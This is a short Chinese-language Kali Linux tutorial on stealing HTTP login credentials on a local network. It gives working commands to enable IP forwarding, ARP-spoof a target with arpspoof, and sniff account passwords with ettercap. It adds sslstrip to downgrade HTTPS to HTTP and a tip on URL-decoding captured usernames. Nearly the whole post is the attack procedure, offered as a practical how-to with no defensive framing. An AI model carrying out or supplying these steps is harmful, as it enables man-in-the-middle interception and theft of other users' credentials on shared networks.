Kali Linux 实战(二):HTTP账户密码获取

1、开启IP转发

    echo 1 > /proc/sys/net/ipv4/ip_forward

2、ARP欺骗

    arpspoof -i eth0 -t 172.16.9.xxx 172.16.8.xx

3、密码获取

    ettercap -Tq -i eth0

    -Tq  >> 启动文本模式 ,q安静模式

    -i 网卡

注:只能获取HTTP网站账户密码(

http://defcon.cn/

结果截图:

Kali Linux 实战(二):HTTP账户密码获取_第1张图片

如果账户名是中文 可用URL解码器(http://www.convertstring.com/zh_CN/EncodeDecode/UrlDecode)解码


sslstrip -a -f -k(可转HTTPS为HTTP)

你可能感兴趣的:(Kali Linux 实战(二):HTTP账户密码获取)